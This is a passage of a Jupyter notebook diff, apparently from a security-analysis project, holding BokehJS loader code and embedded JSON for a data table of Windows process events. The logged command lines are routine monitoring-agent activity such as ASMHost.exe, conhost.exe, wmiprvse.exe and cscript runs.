timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"086121c8-90e0-4c74-b890-d337ac3ad073\" data-root-id=\"1432\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"25caf126-b665-444e-a299-743f1ce3b751\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1434\"},{\"id\":\"1435\"},{\"id\":\"1441\"},{\"id\":\"1436\"},{\"id\":\"1437\"},{\"id\":\"1438\"},{\"id\":\"1439\"}],\"editable\":true,\"height\":550,\"source\":{\"id\":\"1410\"},\"view\":{\"id\":\"1431\"},\"width_policy\":\"max\"},\"id\":\"1432\",\"type\":\"DataTable\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 